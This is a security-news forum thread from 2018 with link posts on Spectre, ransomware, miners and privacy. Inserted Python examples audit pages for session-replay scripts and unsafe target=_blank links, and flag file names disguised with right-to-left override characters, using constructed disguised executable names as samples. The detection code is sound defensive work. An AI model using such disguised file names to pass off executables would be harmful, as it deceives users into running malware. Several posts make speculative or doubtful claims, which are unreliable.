https://www.bleepingcomputer.com/news/security/mozilla-confirms-web-based-execution-vector-for-meltdown-and-spectre-attacks/
-
Intel was aware of the chip vulnerability when its CEO sold off $24 million in company stock
http://www.businessinsider.com/intel-ceo-krzanich-sold-shares-after-company-was-informed-of-chip-flaw-2018-1
-
Mozilla's Firefox update to patch against the Spectre attack:
https://www.mozilla.org/en-US/security/advisories/mfsa2018-01/
Never download unknown software from unknown sources and stay safer!
Up to the next hyped issue!
polonus
-
Crafty malware botnet infects Linux servers via SSH with a cryptominer to mine around 158 Monero.
Re: https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar
polonus
-
Open wifi hacking for fun and bitcoin mining:
https://forums.theregister.co.uk/forum/1/2018/01/05/wi_fi_crypto_mining/
The predictable script kiddie version of this attack can easily be detected by av,
that is why it has been published.
polonus
-
Open wifi hacking for fun and bitcoin mining:
https://forums.theregister.co.uk/forum/1/2018/01/05/wi_fi_crypto_mining/
The predictable script kiddie version of this attack can easily be detected by av,
that is why it has been published.
polonus
Since the value of Bitcoins just took a nosedive, wonder how long this will still be used. :)
-
Hi bob3160,
The whole bitcoin project was never to create a new currency with, to swap money easily around yes, could well be,
but the basics were a prelude to arrive at a new form of de-centralized Internet, the so-called "Golem Project".
As with the original Golem of Prague it matters who holds the "aleph" in the Hebrew word "emet" = truth,
when you take that off you are left with "met", meaning "dead", and the Golem returned to the dust,
it was created from and still can be found in the attic of the Alt-Nay עַל תְּנַא Schul in Prague.
Damian
-
Nvidia vid-cards Spectre vulnerable:
http://nvidia.custhelp.com/app/answers/detail/a_id/4611
polonus
-
Ad-industry keeps websites in the dark about privacy abuse!
Read this report: https://webtransparency.cs.princeton.edu/no_boundaries/session_replay_sites.html
Thousands of websites are sending all your keystrokes via replay-scripts, even with certain adblocking active.
Full list of abusers: https://webtransparency.cs.princeton.edu/no_boundaries/data/sr_site_list.csv.zip
See attached image.
So keep your visors up, block those that ignore your privacy and grab all of your data without consent.
polonus
-
@ Damien,
A new tool to try:
(https://screencast-o-matic.com/screenshots/u/Lh/1516216058239-79296.png)
https://www.grc.com/inspectre.htm
-
@ bob3160,
Steve came up with a new version of the tool. Tried it, it is good and settings stay undefined and restricted.
But alas there are two new attacks in the pipeline based on Spectre and Meltdown, called after the James Bond-films: "Skyfall"and "Solace". Particulars aren't known yet: https://skyfallattack.com/ & https://solaceattack.com/ both Mythic Beasts'domains from the UK (Google driven) on server s on UK and USA, Peter Stevens Cambridge. -> https://toolbar.netcraft.com/site_report?url=http://onza.mythic-beasts.com
pol
-
I'd like to place a security/spam warning.
How can I start a new topic here?
-
I'd like to place a security/spam warning.
How can I start a new topic here?
We are dealing with the spam as it's posted. Avast needs to come up with a permanent way to block spammers from getting to the forum.
Unfortunately that may make it harder for new users to get to the forum.
-
desuCrypt Ransomware in the Wild with DEUSCRYPT and Decryptable Insane Variants
https://www.bleepingcomputer.com/news/security/desucrypt-ransomware-in-the-wild-with-deuscrypt-and-decryptable-insane-variants/
-
Rapid Ransomware Continues Encrypting New Files as they Are Created
https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/
Hacker Uses Malware to Steal Gas From Paying Customers
https://www.bleepingcomputer.com/news/security/hacker-uses-malware-to-steal-gas-from-paying-customers/
-
BlackMailware Found On Porn Site Threatens to Report Users are Spreading Child Porn
https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/
Blackmailware and Scare Tactics may be more efficient than Ransomware
-
Adware malvertising, the big threat of 2017 and still going strong:
Read: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
Mining a reason to keep your adblocker visors high inside your browser of choice!
One could also use an additional anti-miner extension.
polonus
-
Mozilla's apologies for errors made: https://blog.mozilla.org/firefox/retrospective-looking-glass/
polonus
-
Mozilla's apologies for errors made: https://blog.mozilla.org/firefox/retrospective-looking-glass/
polonus
It's always easy to realize that after you've gotten a black eye, that maybe you should have ducked. :)
-
Security Advisory for Flash Player | APSA18-01
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html
-
WannaMine – new cryptocurrency malware exposes failings of traditional anti-virus tools
https://www.pandasecurity.com/mediacenter/mobile-news/wannamine-cryptomining-malware/
-
Malvertizing leads 500k victims to 90 bad Chrome Web Store extensions
https://www.cso.com.au/article/632897/
https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-chrome-extensions-found-chrome-web-store-form-droidclub-botnet/
-
System Cryptomix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/system-cryptomix-ransomware-variant-released/
With this version, when a file is encrypted by the ransomware, it will modify the filename and then append the .SYSTEM extension to encrypted file's name.
-
New JenX IoT DDoS Botnet Offered Part of Gaming Server Rental Scheme
https://www.bleepingcomputer.com/news/security/new-jenx-iot-ddos-botnet-offered-part-of-gaming-server-rental-scheme/
-
WordPress update will break automatic update:
https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/
Installs now should be performed manually. Note that nearly 30% of websites run the WordPress CMS:
https://w3techs.com/technologies/history_overview/content_management
polonus (volunteer website security analyst and website error-hunter)
-
Open tab phishing patched by DuckDuckGo, but Google will not patch it (because it supports Google's core business):
Read: https://sites.google.com/site/bughunteruniversity/nonvuln/phishing-with-window-opener
On that vulnerability: https://www.chaoswebs.net/blog/exploiting-window.opener.html (source credits: Kevin Forman)
polonus (volunteer website security analyst and website error-hunter)
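Both the session-replay warning earlier in this thread and the window.opener issue above are things you can check for in a page's own HTML: a `<script src>` pointing at a replay vendor, and a `target="_blank"` link without `rel="noopener"` (the opened page can then set `window.opener.location` and swap the tab the user came from for a phishing copy). The audit below is an added example and is not from either post, the Princeton study or the linked write-ups. The vendor host list is an assumed short list of companies named in the Princeton study; take the full one from their CSV. The HTML is constructed sample input, so the check runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed illustration list of session-replay vendor hosts; the study's CSV is authoritative.
REPLAY_VENDOR_HOSTS = {
    "fullstory.com", "hotjar.com", "mc.yandex.ru", "smartlook.com",
    "sessioncam.com", "clicktale.net", "userreplay.com",
}


class _PageAudit(HTMLParser):
    """Collect external script sources and target=_blank links lacking rel=noopener."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.unsafe_blank_links = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "a" and a.get("target", "").lower() == "_blank":
            if "noopener" not in a.get("rel", "").lower().split():
                self.unsafe_blank_links.append(a.get("href", ""))


def _host(src):
    # urlparse handles "https://host/..." and protocol-relative "//host/..."; local paths give "".
    return (urlparse(src).hostname or "").lower()


def replay_scripts(srcs):
    """Script sources served from a known replay vendor (or one of its subdomains)."""
    hits = []
    for src in srcs:
        h = _host(src)
        if h and any(h == v or h.endswith("." + v) for v in REPLAY_VENDOR_HOSTS):
            hits.append(src)
    return hits


def audit_page(html):
    p = _PageAudit()
    p.feed(html)
    return {"replay_scripts": replay_scripts(p.script_srcs),
            "unsafe_blank_links": p.unsafe_blank_links}


# Anchor tags that open a new tab; used to add rel=noopener where it is missing.
_BLANK_ANCHOR = re.compile(r'<a\b([^>]*\btarget\s*=\s*["\']?_blank["\']?[^>]*)>', re.I)


def harden_links(html):
    """Add rel="noopener" (plus noreferrer when no rel exists) to target=_blank anchors."""
    def fix(m):
        attrs = m.group(1)
        if re.search(r'\brel\s*=\s*["\'][^"\']*\bnoopener\b', attrs, re.I):
            return m.group(0)
        rel = re.search(r'\brel\s*=\s*(["\'])([^"\']*)\1', attrs, re.I)
        if rel:
            attrs = attrs[:rel.start(2)] + "noopener " + attrs[rel.start(2):]
        else:
            attrs = attrs + ' rel="noopener noreferrer"'
        return "<a" + attrs + ">"
    return _BLANK_ANCHOR.sub(fix, html)


# Constructed sample page (made-up hosts); the hotjar host stands in for any replay vendor.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script src="//script.hotjar.com/modules.js"></script>
</head><body>
<a href="https://partner.example.net" target="_blank">partner</a>
<a href="https://docs.example.com" target="_blank" rel="noopener">docs</a>
<a href="https://other.example.org" target="_blank" rel="nofollow">other</a>
</body></html>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE_HTML))
    print(audit_page(harden_links(SAMPLE_HTML)))
```

The `harden_links` rewrite is the site-side fix; the client-side equivalent is exactly what the uMatrix/NoScript suggestion above amounts to, blocking the replay host's script before it runs. Current browsers have since made `target="_blank"` imply `noopener` by default, but older browsers and explicit `rel="opener"` still leave the tab exposed, so the audit remains worth running.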
-
Black Ruby Ransomware
https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/
-
Be warned, new TCP DOS vector disclosed, called TCP Starvation:
https://github.com/Eplox/TCP-Starvation (source: 9bd6ea1)
polonus
This critical flaw of TCP has been known since 2008, and more secure protocols, like RDP, were not much used
-
Olympic Destroyer, malware that was directed at the critical systems of the Olympic Winter Games,
now being analyzed:
http://blog.talosintelligence.com/2018/02/olympic-destroyer.html
polonus
-
Rapid Ransomware Being Spread Using Fake IRS Malspam
https://www.bleepingcomputer.com/news/security/rapid-ransomware-being-spread-using-fake-irs-malspam/
-
JavaScript Cryptomining Scripts Discovered in 19 Google Play Apps
https://www.bleepingcomputer.com/news/security/javascript-cryptomining-scripts-discovered-in-19-google-play-apps/
-
Telegram 0-Day Used to Spread Monero and Zcash Mining Malware
https://www.bleepingcomputer.com/news/security/telegram-0-day-used-to-spread-monero-and-zcash-mining-malware/
-
A mitigation with policy editor of an attack recently directed at Telegram users:
https://www.ipa.go.jp/security/english/virus/press/201110/E_PR201110.html
About the attack: https://securelist.com/zero-day-vulnerability-in-telegram/83800/
polonus
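The Telegram attack in the Securelist write-up above, and the older IPA advisory, both rest on the same trick: a RIGHT-TO-LEFT OVERRIDE character (U+202E) inside a file name makes a bidi-aware UI draw the rest of the name backwards, so `photo_high_re<RLO>gnp.js` is shown as `photo_high_resj.png` while the OS still launches it as a .js file. The check below is an added example, not code from the post or from either linked page, for flagging such names in an upload or mail gateway; the sample file names are constructed. The displayed-name function is an approximation of bidi rendering (good enough for this trick), not a full implementation of the Unicode bidi algorithm.

```python
RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202c"  # POP DIRECTIONAL FORMATTING, ends an override

# Unicode bidi control characters; none of them belong in a file name.
BIDI_CONTROLS = frozenset(
    "\u200e\u200f\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
)

# Extensions that run code when double-clicked on Windows (assumed, extend to taste).
EXEC_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "exe", "scr", "bat", "cmd",
             "com", "pif", "hta", "ps1", "msi", "jar", "lnk"}


def strip_controls(name):
    return "".join(c for c in name if c not in BIDI_CONTROLS)


def rlo_displayed(name):
    """Approximate what the user sees: text after an RLO is drawn reversed
    until a PDF or the end of the string."""
    head, sep, tail = name.partition(RLO)
    if not sep:
        return strip_controls(name)
    tail, _, rest = tail.partition(PDF)
    return strip_controls(head) + strip_controls(tail)[::-1] + rlo_displayed(rest)


def _ext(name):
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def audit_filename(name):
    """Compare the real extension the OS acts on with the one the user is shown."""
    real = strip_controls(name)
    shown = rlo_displayed(name)
    has_bidi = any(c in BIDI_CONTROLS for c in name)
    return {
        "real_name": real,
        "displayed_name": shown,
        "real_ext": _ext(real),
        "displayed_ext": _ext(shown),
        "has_bidi_control": has_bidi,
        "executable": _ext(real) in EXEC_EXTS,
        # Any bidi control in a file name is reason enough to reject it.
        "suspicious": has_bidi,
    }


def suspicious_names(names):
    return [r for r in (audit_filename(n) for n in names) if r["suspicious"]]


# Constructed sample attachment names.
SAMPLE_NAMES = [
    "report.pdf",
    "photo_high_re\u202egnp.js",     # shown as photo_high_resj.png, runs as .js
    "invoice_\u202efdp.scr",         # shown as invoice_rcs.pdf, runs as .scr
]

if __name__ == "__main__":
    for r in suspicious_names(SAMPLE_NAMES):
        print(f"{r['displayed_name']!r} is really {r['real_name']!r} "
              f"(.{r['real_ext']}, executable={r['executable']})")
```

A gateway should reject on `has_bidi_control` alone rather than only on an extension mismatch; there is no legitimate reason for an override character in an attachment name, and the mismatch test depends on how faithfully the receiving UI renders bidi text.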
-
Bingo, Amigo! Jackpotting: ATM malware from Latin America to the World
https://securelist.com/atm-malware-from-latin-america-to-the-world/83836/
-
February Patch Tuesday Is a Bouquet of Fixes for Privilege Escalation Vulnerabilities
https://blog.trendmicro.com/trendlabs-security-intelligence/february-patch-tuesday-bouquet-fixes-privilege-escalation-vulnerabilities/
-
UK Formally Accuses Russian Military of NotPetya Ransomware Outbreak
https://www.bleepingcomputer.com/news/security/uk-formally-accuses-russian-military-of-notpetya-ransomware-outbreak/
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Interesting, since Google used 'Huawei' for the Google Nexus 6P and I have had mine for almost two years ;)
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Interesting, since Google used 'Huawei' for the Google Nexus 6P and I have had mine for almost two years ;)
What's important is to always be "Politically Correct". :) :) :)
-
Six top US intelligence chiefs caution against buying Huawei phones
https://www.cnbc.com/2018/02/13/chinas-hauwei-top-us-intelligence-chiefs-caution-americans-away.html
If it's from Russia, China or North Korea and you live in the US, the warning will always be "Don't use the product or service."
Does North Korea produce anything sold in US / Europe ? Do they make anything at all we want .... rice maybe
-
Multi-Stage Word Attack Infects Users Without Using Macros (infection with password stealer)
https://www.bleepingcomputer.com/news/security/multi-stage-word-attack-infects-users-without-using-macros/
-
New Saturn RaaS Lets Everyone Become a Ransomware Distributor for Free
https://www.bleepingcomputer.com/news/security/new-saturn-raas-lets-everyone-become-a-ransomware-distributor-for-free/
-
LockCrypt .1BTC Variant Installed Over Hacked Remote Desktop Services
https://www.bleepingcomputer.com/news/security/lockcrypt-1btc-variant-installed-over-hacked-remote-desktop-services/
-
Iranian Hackers Use New Trojan in Recent Attacks
https://www.securityweek.com/iranian-hackers-use-new-trojan-recent-attacks
SamSam Ransomware Hits Colorado DOT, Agency Shuts Down 2,000 Computers
https://www.bleepingcomputer.com/news/security/samsam-ransomware-hits-colorado-dot-agency-shuts-down-2-000-computers/
-
Data Keeper Ransomware Makes First Victims Two Days After Release on Dark Web RaaS
https://www.bleepingcomputer.com/news/security/data-keeper-ransomware-makes-first-victims-two-days-after-release-on-dark-web-raas/
-
Russia Hacked Olympics Computers, Turned Blame on North Korea: Report
https://www.securityweek.com/russia-hacked-olympics-computers-turned-blame-north-korea-report
-
Ad Network Uses DGA Algorithm to Bypass Ad Blockers and Deploy In-Browser Miners
https://www.bleepingcomputer.com/news/security/ad-network-uses-dga-algorithm-to-bypass-ad-blockers-and-deploy-in-browser-miners/
-
New Mirai Variant Focuses on Turning IoT Devices into Proxy Servers
https://www.bleepingcomputer.com/news/security/new-mirai-variant-focuses-on-turning-iot-devices-into-proxy-servers/
-
Memcache Servers Can Be Abused for Insanely Massive DDoS Attacks
https://www.bleepingcomputer.com/news/security/memcache-servers-can-be-abused-for-insanely-massive-ddos-attacks/
-
Cryptocurrency-Mining Malware: 2018’s New Menace?
https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/
-
NOW Hackers Are Mining Crypto On Government Websites
https://futurism.com/hackers-mining-crypto-government-websites/
-
GitHub was hit by the most powerful DDoS attack in history
https://www.grahamcluley.com/github-hit-powerful-ddos-attack-history/
-
Cryptomining Gold Rush: One Gang Rakes In $7M Over 6 Months
https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/
-
GandCrab Ransomware Version 2 Released With New .Crab Extension & Other Changes
https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-version-2-released-with-new-crab-extension-and-other-changes/
-
Proof-of-Concept Code for Memcached DDoS Attacks Published Online
https://www.bleepingcomputer.com/news/security/proof-of-concept-code-for-memcached-ddos-attacks-published-online/
-
CIA exploits against MikroTik routers: https://securelist.com/apt-slingshot/84312/
Theater scene: Africa and the Middle East.
Earlier, MikroTik in Russia and Central Europe was also being attacked: https://forum.mikrotik.com/viewtopic.php?t=119255
MikroTik in Poland is found at technical universities and also as free open Wi-Fi in cities (EU project).
Why are CIA Frankfurt and Bucuresti so interested in building exploits against it?
Because a lot of Mikrotik routers reside in Moscow for instance, and we have a new hot cyberwar going.
That is why Kaspersky's became banned from Anglo-American government devices.
Nothing is like it seems folks, no way.
polonus
-
Downloads loaded with bitcoin stealer: https://www.welivesecurity.com/2018/03/14/stealing-bitcoin-download-com/
polonus
-
BlackTDS Emerges as an As-a-Service Drive-By Kit for Malware Distribution
https://www.infosecurity-magazine.com/news/blacktds-emerges-as-an-as-a/
-
Zenis Ransomware Encrypts Your Data & Deletes Your Backups
https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/
VT: https://www.virustotal.com/#/file/9730e03ca9d052875895b4ad7ba7914f69009fd5fb58d324ee35d3e45f90d768/detection
-
Author of Polski, Vortex, and Flotera Ransomware Families Arrested in Poland
https://www.bleepingcomputer.com/news/security/author-of-polski-vortex-and-flotera-ransomware-families-arrested-in-poland/
-
GrayKey iPhone unlocker poses serious security concerns
https://blog.malwarebytes.com/security-world/2018/03/graykey-iphone-unlocker-poses-serious-security-concerns/
-
(https://screencast-o-matic.com/screenshots/u/Lh/1521551988409-53976.png)
https://amdflaws.com/ (https://amdflaws.com/)
-
L.S.
How to leave their "Hotel California-like services"
(seen in the light of the recent Facebook Cambridge Analytica privacy data breach nightmare).
Best is to get unhooked from the habit of filling these monsters with all your data:
http://backgroundchecks.org/justdeleteme/
polonus
-
TrickBot Banking Trojan Gets Screenlocker Component
https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-gets-screenlocker-component/
-
Drupal 7 and 8 core highly critical release on March 28th, 2018 PSA-2018-001
https://www.drupal.org/psa-2018-001
-
Top Security Execs at Google, Facebook, and Twitter Announce Departures
https://www.bleepingcomputer.com/news/security/top-security-execs-at-google-facebook-and-twitter-announce-departures/
-
Child abuse imagery found within bitcoin's blockchain
https://www.theguardian.com/technology/2018/mar/20/child-abuse-imagery-bitcoin-blockchain-illegal-content
-
Child abuse imagery found within bitcoin's blockchain
https://www.theguardian.com/technology/2018/mar/20/child-abuse-imagery-bitcoin-blockchain-illegal-content
Amazing. :o :(
-
L.S.
How to leave their "Hotel California-like services"
(seen in the light of the recent Facebook Cambridge Analytica privacy data breach nightmare).
Best is to get unhooked from the habit of filling these monsters with all your data:
http://backgroundchecks.org/justdeleteme/
polonus
Next Step: https://www.reuters.com/article/us-facebook-cambridge-analytica-lawsuits/facebook-cambridge-analytica-sued-in-u-s-by-users-over-data-harvesting-idUSKBN1GX1XK
Thank you for the link above 'justdeleteme'.
-
City of Atlanta IT Systems Hit by SamSam Ransomware
https://www.bleepingcomputer.com/news/security/city-of-atlanta-it-systems-hit-by-samsam-ransomware/
-
GitLab Critical Security Release: 10.5.6, 10.4.6, and 10.3.9
https://about.gitlab.com/2018/03/20/critical-security-release-gitlab-10-dot-5-dot-6-released/
-
The AVCrypt Ransomware Tries To Uninstall Your AV Software
https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/
-
Why doesn't Google do a better job of keeping this crap and insecurity out of their webstore?
Read and shiver: https://www.av-comparatives.org/mobile-security/
That's why we should stick to avast mobile security and their accompanying tools!
Be aware there is many an insecure dark alleyway on the Interwebs, folks 8) >:(
polonus
-
Same problem exists on Microsoft store and the Apple store.
-
Decrypters for Some Versions of Magniber Ransomware Released
https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/
-
New Matrix Ransomware Variants Installed Via Hacked Remote Desktop Services
https://www.bleepingcomputer.com/news/security/new-matrix-ransomware-variants-installed-via-hacked-remote-desktop-services/
Unfortunately, these variants of Matrix Ransomware cannot be decrypted for free.
-
Sometimes having Facebook Friends, isn't such a good idea.
https://bob3160.blogspot.com/2018/04/sometimes-having-facebook-friends-isnt.html
-
PowerHammer: Exfiltrating Data from Air-Gapped Computers through Power Lines
https://arxiv.org/abs/1804.04014
-
Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices
https://www.us-cert.gov/ncas/alerts/TA18-106A
-
Google is listening :o https://m.youtube.com/watch?v=zBnDWSvaQ1I
https://www.unilad.co.uk/technology/google-is-listening-to-everything-we-say-and-you-can-hear-it-back/
-
Google is listening :o https://m.youtube.com/watch?v=zBnDWSvaQ1I
https://www.unilad.co.uk/technology/google-is-listening-to-everything-we-say-and-you-can-hear-it-back/
(https://screencast-o-matic.com/screenshots/u/Lh/1524518703167-9768.png)
https://privacy.google.com/#
It's always nice to know the whole story not just the headlines. :)
-
Websites with unpatched Drupal framework should consider themselves to be compromised.
See: https://github.com/rapid7/metasploit-framework/issues/9789
POC: https://github.com/nixawk/labs/issues/19
The hack is embroidering further on the schemes of a previous exploit dating back to 2014.
Always remember folks, there is nothing new in this ol' world, polonus has been long enough around to know,
the devil is always going to play out a variant of the same old trick. ;D :D
polonus (volunteer website security analyst and website error-hunter)
-
(https://screencast-o-matic.com/screenshots/u/Lh/1524835193272-76965.png)
https://blog.avast.com/amazon-hacked-for-ethereum-heist-and-new-security-laws-affect-uk-avast
-
Keeping your account secure
https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html
-
A Vulnerability in 7-Zip Could Allow for Arbitrary Code Execution
https://www.cisecurity.org/advisory/a-vulnerability-in-7-zip-could-allow-for-arbitrary-code-execution_2018-049/
-
https://www.androidpolice.com/2018/05/02/google-amazon-closing-domain-fronting-loopholes-used-bypass-web-censorship/ (N.B. this link is being canvas fingerprinted for you, secure your last vestiges of online privacy).
First Google and now AWS (Amazon) close "domain fronting" service for Moxie Marlinspike's chat-app Signal.
For Google and AWS their core-business to Arab censorship states weighs heavier
than e2e encryption chat-app end-user security.
In the process we lose more and more of our Internet freedoms!
As we need such large CDNs to facilitate "domain fronting", where to turn to now?
Now Signal developers have to look for other ways to circumvent state surveillance.
polonus
-
Also Microsoft announced to stop providing this technique to circumvent state surveillance.
Re: https://blog.torproject.org/domain-fronting-critical-open-web
Just the independent journalist that depends for his or her security on it (out on tor, signal etc.)
are placed at jeopardy, thanks to the Big Brother Big Imperium State sp**ks that want to hack, block
and oversee all and everything.
And Google, AWS & also Microsoft now even better facilitate them sp**ks
(however sometimes urged forcefully under gag order).
To-morrow will be our Dutch Liberation Day, but can we still celebrate to have a really free Internet
or should we all be fearful inside the online panopticon that sees and hears all? >:(
polonus
-
All twitter users are urged to change their passwords
A breach through a bug leaked all plain-text passwords, gold for password hackers!
https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html
polonus
-
Russia now blocks 50 VPN services, as a Moscow court blocked access to the cloud-based instant messaging service Telegram in Russia. Google, Amazon and Microsoft now no longer will offer "domain fronting",
which also endangers users of tor and other similar software.
More:
http://tass.com/economy/1002762
We do not know what VPN services are affected.
polonus
-
In the line of this all: https://blog.torproject.org/domain-fronting-critical-open-web
polonus
-
Researchers find a very serious hole in PGP and S/MIME -
Journalists, political activists or whistleblowers are at risk!
And another time it is on the client-side!
What to trust and has everything now been thoroughly and utterly pn*wed by the Forces that Be?
Read: https://forums.theregister.co.uk/forum/1/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/
also very interesting read here: https://efail.de/
polonus (volunteer website security analyst and website error-hunter)
-
Microsoft Patch Tuesday for May Includes Updates for Actively-Exploited Vulnerabilities
https://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patch-tuesday-for-may-includes-updates-for-actively-exploited-vulnerabilities-2/
-
Malicious Traffic in Port 7001 Surges as Cryptominers Target Patched 2017 Oracle WebLogic Vulnerability
https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-traffic-in-port-7001-surges-as-cryptominers-target-patched-2017-oracle-weblogic-vulnerability/
-
Security updates available for Adobe Acrobat and Reader | APSB18-09
https://helpx.adobe.com/security/products/acrobat/apsb18-09.html
-
Hacking attempt on central.owncloud.org
https://central.owncloud.org/t/hacking-attempt-on-central-owncloud-org/13535
-
VPNFilter malware infects 500,000 routers and NASes:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Vulnerable are Linksys, MikroTik, NETGEAR, TP-Link routers & QNAP-built NAS.
Ukrainian systems are being infested now like wildfire.
Providers are being asked to reset their customer's routers.
polonus
-
VMware Security Advisories - VMSA-2018-0013
https://www.vmware.com/security/advisories/VMSA-2018-0013.html
-
Pornhub launches its own VPN ;D
https://www.theverge.com/2018/5/24/17382144/pornhub-launches-vpn-vpnhub
https://thenextweb.com/apps/2018/05/25/pornhub-launches-a-vpn-for-discreet-browsing-on-mobile-and-desktop/
-
Next we'll have Facebook VPN :o
-
Next we'll have Facebook VPN :o
I didn't need Facebook. So I'm not interested in 'Facebook VPN'
-
VPNFilter malware infects 500,000 routers and NASes:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
Vulnerable are Linksys, MikroTik, NETGEAR, TP-Link routers & QNAP-built NAS.
Ukrainian systems are being infested now like wildfire.
Providers are being asked to reset their customer's routers.
polonus
VPNFilter: New Router Malware with Destructive Capabilities
https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware
-
10 unsafe plug-ins for webshops' WordPress locked:
https://blog.threatpress.com/vulnerable-wordpress-plugins-multidots/
Webshop sites that haven't disabled these vulnerable plug-ins are still vulnerable.
polonus
-
Attack Vectors in Orbit: The Need for IoT and Satellite Security in the Age of 5G
https://blog.trendmicro.com/trendlabs-security-intelligence/attack-vectors-in-orbit-need-for-satellite-security-in-5g-iot/
-
U.S. lawmakers want Google to reconsider links to China's Huawei
https://www.reuters.com/article/us-usa-china-congress-alphabet/u-s-lawmakers-want-google-to-reconsider-links-to-chinas-huawei-idUSKBN1JG2YK
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my Windows 10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazon's daft speaker Alexa.
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my Windows 10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazon's daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my Windows 10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazon's daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
-
Microsoft Stops Cortana From Giving People Access To Your PC
https://www.tomshardware.com/news/microsoft-update-cortana-security-vulnerability,37297.html
Personally I hated the Cortana idea right from the start and it had nothing to do with this potential security breach. I just hated the concept of Cortana digging into your every orifice gathering data.
Right from the start on my Windows 10 system I sought to curtail Cortana, e.g. I would love to be able to completely disable it.
Not so long ago people were considered bonkers when talking to inanimate objects :)
I don't particularly like the concept of using OK Google either, or Amazon's daft speaker Alexa.
I happen to use and enjoy both Alexa and Ok or Hey Google. :)
https://youtu.be/sgNIcKHlqrY
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
